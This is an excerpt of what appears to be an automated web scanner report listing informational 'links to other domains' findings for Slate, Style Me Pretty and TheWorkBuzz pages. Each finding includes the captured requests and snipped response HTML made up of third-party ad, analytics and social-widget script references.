<div id="recommend_tab"><a target="_blank" class="recommend recommend-facebook" rel="nofollow" title="Share on Facebook" href="http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book.">Facebook</a><a target="_blank" class="recommend recommend-digg" rel="nofollow" title="Digg This" href="http://digg.com/submit?phase=2&url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild">Digg</a><a target="_blank" class="recommend recommend-reddit" rel="nofollow" title="Share with Reddit" href="http://reddit.com/submit?url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild">Reddit</a><a target="_blank" class="recommend recommend-stumbleupon" rel="nofollow" title="Share with Stumble Upon" href="http://www.stumbleupon.com/submit?url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild">StumbleUpon</a>
...[SNIP]...
about their looks and weight, and displayed higher stress levels and rates of suicide and depression. Your average progressive parent probably already sensed the corrosive effect of sexualized dolls (<a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fs%3Fie%3DUTF8%26x%3D0%26ref_%3Dnb_sb_noss%26y%3D0%26field-keywords%3Dbratz%26url%3Dsearch-alias%253Daps&tag=slatmaga-20&linkCode=ur2&camp=1789&creative=390957" target="_blank" xmlns:tools="XslTools">Bratz</a>
...[SNIP]...
</em><a href="http://www.facebook.com/slate" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</em><a href="http://www.twitter.com/slate" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
<div style="float:left"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&layout=standard&show_faces=false&width=400&action=like&font=arial&colorscheme=light&height=40" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:400px; height:40px;" allowTransparency="true" xmlns:fb="http://www.facebook.com/2008/fbml"></iframe>
...[SNIP]...
<div id="twitter_tool" class="DigBuzz"><a id="twittertoolanc" href="http://twitter.com/home?status=Slate+Magazine+-+Barbies+Gone+Wild%20-%200" target="_blank" style="margin:0"><img src="http://img.slate.com/images/tool_buttons/tweet.gif">
...[SNIP]...
<div id="facebook_tool" class="DigBuzz"><a id="fbtoolanc" href="http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book." style="margin:0" target="_blank"><img src="http://img.slate.com/images/tool_buttons/facebook.gif">
...[SNIP]...
<div id="author_bio"><a href="http://www.mylagoldberg.com/" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</em><a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fentity%2FMyla-Goldberg%2FB001IOBQYG%3Fie%3DUTF8%26ref_%3Dsr_ntt_srch_lnk_1%26qid%3D1296150636%26sr%3D8-1&tag=slatmaga-20&linkCode=ur2&camp=1789&creative=390957" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
<div style="width:308px;border-bottom:solid 1px #ccc;margin-left:6px"><iframe src="http://www.facebook.com/plugins/likebox.php?id=21516776437&width=220&connections=0&stream=false&header=false&height=60" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:220px; height:60px; margin-left:52px" allowTransparency="true"></iframe></div><div style="width:334px;height:183px;overflow:hidden;overflow-y:scroll;"><iframe src="http://www.facebook.com/plugins/activity.php?site=www.slate.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:306px; height:600px;margin-left:14px;" allowTransparency="true"></iframe>
...[SNIP]...
</script><script type="text/javascript" src="http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/rev_platform_ads.min.js"></script>
...[SNIP]...
<div id="toc_media_item_3" style="z-index:3">Wingman.<a href="http://www.doonesbury.com/"><img style="margin-left:6px;" width="306" height="202" src="http://img.slate.com/media/298/td.jpg" alt="298/td.jpg">
...[SNIP]...
</script><object id="homepagePlayer" width="320" height="235" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0"><param name="flashVars" value="playlistId=64696393001&adNode=slate.v.video/slatev&hideCompanion=false">
...[SNIP]...
<div class="header_content"><a class="links" href="http://twitter.com/Slate"></a>
...[SNIP]...
<p class="hed">Guys jumps off trampoline, dunks himself through basketball hoop. <a href="http://deadsp.in/gXIoPd">http://deadsp.in/gXIoPd</a>
...[SNIP]...
<p class="hed">Obama administration is backing off and waiting, as everyone is waiting, for collapse of Mubarak government. <a href="http://search.twitter.com/search?q=%23Egypt" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/intra/hashtag/#Egypt');">#Egypt</a> <a href="http://slate.me/gnohLd">http://slate.me/gnohLd</a>
...[SNIP]...
<p class="hed">BREAKING: Dennis Kucinich settled his lawsuit against the House cafeteria over the olive he bit into... <a href="http://slate.me/iaYMxt">http://slate.me/iaYMxt</a>
...[SNIP]...
<div class="partner_feed_cntr" id="root_feed" xmlns:atom="http://www.w3.org/2005/Atom"><a id="root_logo" style="display:block;background-color:#676735;" target="_blank" href="http://www.theroot.com/?from=rss"><img src="http://img.slate.com/Images/redesign2008/feeds/theroot.gif" alt="The Root">
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/buzz/tichina-arnold-return-television" style="color:#676735">Tichina Arnold To Return to Television</a>
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/buzz/egypt-crisis-intensifies" style="color:#676735">Egypt Crisis Intensifies</a>
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/views/root-interview-corinne-bailey-rae-getting-happy" style="color:#676735">The Root Interview: Corinne Bailey Rae on Getting to Happy</a>
...[SNIP]...
<div class="partner_feed_cntr" id="foreignpolicy_feed" xmlns:atom="http://www.w3.org/2005/Atom"><a id="foreignpolicy_logo" style="display:block;background-color:#000;" target="_blank" href="http://www.foreignpolicy.com"><img src="http://img.slate.com/Images/redesign2008/feeds/foreignpolicy.gif" alt="Foreign Policy">
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/25/day_of_rage" style="color:#000">Egypt Burning: The Latest Street Scenes</a>
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/27/egypt_s_struggle_for_freedom" style="color:#000">Egypt's Struggle for Freedom</a>
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/20/close_encounters_of_the_buddhist_kind" style="color:#000">Close Encounters of the Buddhist Kind</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/textlinks/js/utilsTextLinksXML.js">

</script>
...[SNIP]...
</a> |
<a href="http://www.facebook.com/pages/Slatecom/21516776437"><em>
...[SNIP]...
<div id="wapo_338542" xmlns=""><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/wapolabs/utils/wapo.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js" xmlns="" xmlns:tools="XslTools"></script><noscript xmlns="" xmlns:tools="XslTools"><img src="http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"></noscript>
...[SNIP]...
</script><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J05531" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/audsci.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...

22.485. http://www.slate.com/id/2282444/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.slate.com
Path:	/id/2282444/

Issue detail

The page was loaded from a URL containing a query string:

http://www.slate.com/id/2282444/?GT1=38001

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://deadsp.in/gXIoPd
http://digg.com/submit?phase=2&url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://edge.quantserve.com/quant.js
http://js-kit.com/comments-count.js
http://js.adsonar.com/js/adsonar.js
http://js.revsci.net/gateway/gw.js?csid=J05531
http://media.washingtonpost.com/wp-srv/ad/audsci.js
http://media.washingtonpost.com/wp-srv/ad/slate_ad2.js
http://media.washingtonpost.com/wp-srv/ad/textlinks/js/utilsTextLinksXML.js
http://media.washingtonpost.com/wp-srv/ad/textlinks/style/textlinks.css
http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js
http://media.washingtonpost.com/wp-srv/wapolabs/utils/wapo.js
http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/rev_platform_ads.min.js
http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif
http://platform.twitter.com/anywhere.js?id=tDoKZOQ1QduBuHW8Q9MXTA&v=1
http://reddit.com/submit?url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild
http://search.twitter.com/search?q=%23Egypt
http://slate.me/gnohLd
http://slate.me/iaYMxt
http://twitter.com/Slate
http://twitter.com/home?status=Slate+Magazine+-+Barbies+Gone+Wild%20-%200
http://www.amazon.com/gp/product/0061711527?ie=UTF8&tag=slatmaga-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0061711527
http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fentity%2FMyla-Goldberg%2FB001IOBQYG%3Fie%3DUTF8%26ref_%3Dsr_ntt_srch_lnk_1%26qid%3D1296150636%26sr%3D8-1&tag=slatmaga-20&linkCode=ur2&camp=1789&creative=390957
http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fs%3Fie%3DUTF8%26x%3D0%26ref_%3Dnb_sb_noss%26y%3D0%26field-keywords%3Dbratz%26url%3Dsearch-alias%253Daps&tag=slatmaga-20&linkCode=ur2&camp=1789&creative=390957
http://www.doonesbury.com/
http://www.facebook.com/pages/Slatecom/21516776437
http://www.facebook.com/plugins/activity.php?site=www.slate.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true
http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&layout=button_count&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=21
http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&layout=standard&show_faces=false&width=400&action=like&font=arial&colorscheme=light&height=40
http://www.facebook.com/plugins/likebox.php?id=21516776437&width=220&connections=0&stream=false&header=false&height=60
http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book.
http://www.facebook.com/slate
http://www.foreignpolicy.com/
http://www.foreignpolicy.com/articles/2011/01/20/close_encounters_of_the_buddhist_kind
http://www.foreignpolicy.com/articles/2011/01/25/day_of_rage
http://www.foreignpolicy.com/articles/2011/01/27/egypt_s_struggle_for_freedom
http://www.magreprints.com/quickquote.aspx
http://www.mylagoldberg.com/
http://www.stumbleupon.com/submit?url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild
http://www.theroot.com/?from=rss
http://www.theroot.com/buzz/old-spice-guy-returns
http://www.theroot.com/buzz/will-tea-party-favorite-become-next-black-us-senator
http://www.theroot.com/views/brick-city-documentary-season-2-real-time-cory-booker
http://www.twitter.com/slate

Request

GET /id/2282444/?GT1=38001 HTTP/1.1
Host: www.slate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:11:45 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en-US" lang="en-US" xmlns:lookup="XslLookup" xmlns="xhtml"><he
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/slate_ad2.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><link rel="stylesheet" type="text/css" href="http://media.washingtonpost.com/wp-srv/ad/textlinks/style/textlinks.css" xmlns="" xmlns:tools="XslTools"><link rel="stylesheet" type="text/css" href="http://img.slate.com/css/echo.css" xmlns="" xmlns:tools="XslTools">
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/anywhere.js?id=tDoKZOQ1QduBuHW8Q9MXTA&v=1" xmlns=""></script>
...[SNIP]...
<em><a href="http://www.amazon.com/gp/product/0061711527?ie=UTF8&tag=slatmaga-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0061711527" target="_blank" xmlns:tools="XslTools"><span style="color:#0000ff;">
...[SNIP]...
<div style="padding:3px"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&layout=button_count&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true" xmlns:fb="http://www.facebook.com/2008/fbml"></iframe>
...[SNIP]...
</a><a class="tools tools-reprint" title="Reprints" href="http://www.magreprints.com/quickquote.aspx" target="_blank" rel="nofollow">REPRINTS</a>
...[SNIP]...
<div id="recommend_tab"><a target="_blank" class="recommend recommend-facebook" rel="nofollow" title="Share on Facebook" href="http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book.">Facebook</a><a target="_blank" class="recommend recommend-digg" rel="nofollow" title="Digg This" href="http://digg.com/submit?phase=2&url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild">Digg</a><a target="_blank" class="recommend recommend-reddit" rel="nofollow" title="Share with Reddit" href="http://reddit.com/submit?url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild">Reddit</a><a target="_blank" class="recommend recommend-stumbleupon" rel="nofollow" title="Share with Stumble Upon" href="http://www.stumbleupon.com/submit?url=http://www.slate.com/id/2282444/&title=Slate+Magazine+-+Barbies+Gone+Wild">StumbleUpon</a>
...[SNIP]...
about their looks and weight, and displayed higher stress levels and rates of suicide and depression. Your average progressive parent probably already sensed the corrosive effect of sexualized dolls (<a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fs%3Fie%3DUTF8%26x%3D0%26ref_%3Dnb_sb_noss%26y%3D0%26field-keywords%3Dbratz%26url%3Dsearch-alias%253Daps&tag=slatmaga-20&linkCode=ur2&camp=1789&creative=390957" target="_blank" xmlns:tools="XslTools">Bratz</a>
...[SNIP]...
</em><a href="http://www.facebook.com/slate" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</em><a href="http://www.twitter.com/slate" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
<div style="float:left"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.slate.com/id/2282444&layout=standard&show_faces=false&width=400&action=like&font=arial&colorscheme=light&height=40" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:400px; height:40px;" allowTransparency="true" xmlns:fb="http://www.facebook.com/2008/fbml"></iframe>
...[SNIP]...
<div id="twitter_tool" class="DigBuzz"><a id="twittertoolanc" href="http://twitter.com/home?status=Slate+Magazine+-+Barbies+Gone+Wild%20-%200" target="_blank" style="margin:0"><img src="http://img.slate.com/images/tool_buttons/tweet.gif">
...[SNIP]...
<div id="facebook_tool" class="DigBuzz"><a id="fbtoolanc" href="http://www.facebook.com/sharer.php?u=http://www.slate.com/id/2282444/&t=Cinderella+Ate+My+Daughter:+Peggy+Orenstein's+new+book." style="margin:0" target="_blank"><img src="http://img.slate.com/images/tool_buttons/facebook.gif">
...[SNIP]...
<div id="author_bio"><a href="http://www.mylagoldberg.com/" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</em><a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fentity%2FMyla-Goldberg%2FB001IOBQYG%3Fie%3DUTF8%26ref_%3Dsr_ntt_srch_lnk_1%26qid%3D1296150636%26sr%3D8-1&tag=slatmaga-20&linkCode=ur2&camp=1789&creative=390957" target="_blank" xmlns:tools="XslTools"><em>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
<div style="width:308px;border-bottom:solid 1px #ccc;margin-left:6px"><iframe src="http://www.facebook.com/plugins/likebox.php?id=21516776437&width=220&connections=0&stream=false&header=false&height=60" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:220px; height:60px; margin-left:52px" allowTransparency="true"></iframe></div><div style="width:334px;height:183px;overflow:hidden;overflow-y:scroll;"><iframe src="http://www.facebook.com/plugins/activity.php?site=www.slate.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:306px; height:600px;margin-left:14px;" allowTransparency="true"></iframe>
...[SNIP]...
</script><script type="text/javascript" src="http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/rev_platform_ads.min.js"></script>
...[SNIP]...
<div id="toc_media_item_3" style="z-index:3">Ya gotta believe.<a href="http://www.doonesbury.com/"><img style="margin-left:6px;" width="306" height="202" src="http://img.slate.com/media/298/td.jpg" alt="298/td.jpg">
...[SNIP]...
</script><object id="homepagePlayer" width="320" height="235" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0"><param name="flashVars" value="playlistId=64696393001&adNode=slate.v.video/slatev&hideCompanion=false">
...[SNIP]...
<div class="header_content"><a class="links" href="http://twitter.com/Slate"></a>
...[SNIP]...
<p class="hed">Guys jumps off trampoline, dunks himself through basketball hoop. <a href="http://deadsp.in/gXIoPd">http://deadsp.in/gXIoPd</a>
...[SNIP]...
<p class="hed">Obama administration is backing off and waiting, as everyone is waiting, for collapse of Mubarak government. <a href="http://search.twitter.com/search?q=%23Egypt" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/intra/hashtag/#Egypt');">#Egypt</a> <a href="http://slate.me/gnohLd">http://slate.me/gnohLd</a>
...[SNIP]...
<p class="hed">BREAKING: Dennis Kucinich settled his lawsuit against the House cafeteria over the olive he bit into... <a href="http://slate.me/iaYMxt">http://slate.me/iaYMxt</a>
...[SNIP]...
<div class="partner_feed_cntr" id="root_feed" xmlns:atom="http://www.w3.org/2005/Atom"><a id="root_logo" style="display:block;background-color:#676735;" target="_blank" href="http://www.theroot.com/?from=rss"><img src="http://img.slate.com/Images/redesign2008/feeds/theroot.gif" alt="The Root">
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/buzz/will-tea-party-favorite-become-next-black-us-senator" style="color:#676735">Will a Tea Party Favorite Become the Next Black U.S. Senator?</a>
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/views/brick-city-documentary-season-2-real-time-cory-booker" style="color:#676735">'Brick City' Documentary Season 2: Real Time With Cory Booker</a>
...[SNIP]...
<li style="color:#676735"><a target="_blank" href="http://www.theroot.com/buzz/old-spice-guy-returns" style="color:#676735">The Old Spice Guy Returns</a>
...[SNIP]...
<div class="partner_feed_cntr" id="foreignpolicy_feed" xmlns:atom="http://www.w3.org/2005/Atom"><a id="foreignpolicy_logo" style="display:block;background-color:#000;" target="_blank" href="http://www.foreignpolicy.com"><img src="http://img.slate.com/Images/redesign2008/feeds/foreignpolicy.gif" alt="Foreign Policy">
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/25/day_of_rage" style="color:#000">Egypt Burning: The Latest Street Scenes</a>
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/27/egypt_s_struggle_for_freedom" style="color:#000">Egypt's Struggle for Freedom</a>
...[SNIP]...
<li style="color:#000"><a target="_blank" href="http://www.foreignpolicy.com/articles/2011/01/20/close_encounters_of_the_buddhist_kind" style="color:#000">Close Encounters of the Buddhist Kind</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/textlinks/js/utilsTextLinksXML.js">

</script>
...[SNIP]...
</a> |
<a href="http://www.facebook.com/pages/Slatecom/21516776437"><em>
...[SNIP]...
<div id="wapo_338542" xmlns=""><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/wapolabs/utils/wapo.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js" xmlns="" xmlns:tools="XslTools"></script><noscript xmlns="" xmlns:tools="XslTools"><img src="http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"></noscript>
...[SNIP]...
</script><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J05531" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/audsci.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:

http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2
http://pixel.quantserve.com/pixel/p-25H0h4A4rJexA.gif
http://platform.twitter.com/widgets.js?ver=3.0.4
http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4
http://stats.wordpress.com/e-201104.js
http://www.facebook.com/pages/Style-Me-Pretty/51850479973
http://www.twitter.com/stylemepretty

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:03:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:28 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:03:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<link rel="pingback" href="http://www.stylemepretty.com/xmlrpc.php" />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2'></script>
...[SNIP]...
<td style="padding-bottom: 10px; padding-left:10px; vertical-align:middle;" ><a style="font-size:1.1em;" rel="nofollow" href="http://www.facebook.com/pages/Style-Me-Pretty/51850479973">Visit us on <b>
...[SNIP]...
<td style="padding-left:10px; vertical-align:middle; padding-bottom:10px;" ><a style="font-size:1.1em;" rel="nofollow" href="http://www.twitter.com/stylemepretty">Follow us on <b>
...[SNIP]...
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-25H0h4A4rJexA.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4'></script>
<script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

22.487. http://www.theworkbuzz.com/employment-trends/video-interviews/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/employment-trends/video-interviews/

Issue detail

The page was loaded from a URL containing a query string:

http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js?ver=3.0.4
http://advertising.msn.com/home/home.asp
http://alexandralevit.typepad.com/
http://alltop.com/
http://askamanager.blogspot.com/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/default.aspx
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://badges.alltop.com/images/alltop_170x30_we2.jpg
http://blog.generationrelations.com/
http://blog.penelopetrunk.com/
http://blogs.abcnews.com/womenomics/
http://blogs.msdn.com/heatherleigh/default.aspx
http://blogs.wsj.com/laidoff/?mod=blogmod
http://blstc.redacted/br/gbl/lg/1/l/msft.gif
http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4
http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4
http://careerealism.wordpress.com/
http://careers.redacted/
http://careers.redacted/help.aspx
http://cityguides.redacted/
http://evilhrlady.blogspot.com/
http://g.redacted/0AD00036/931292.1??HCType=1&CID=931292&PG=SHPHDR
http://g.redacted/0TO_/enus
http://g.redacted/2privacy/enus
http://games.redacted/
http://health.redacted/
http://hotmail.redacted/
http://hrminion.blogspot.com/
http://hrwench.blogspot.com/
http://ie8.redacted/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A
http://im.live.com/messenger/im/home/?source=MSNTDLINK
http://img.icbdr.com/images/pixel.gif
http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif
http://keppiecareers.wordpress.com/
http://latino.redacted/empleos/
http://lifestyle.redacted/default.aspx
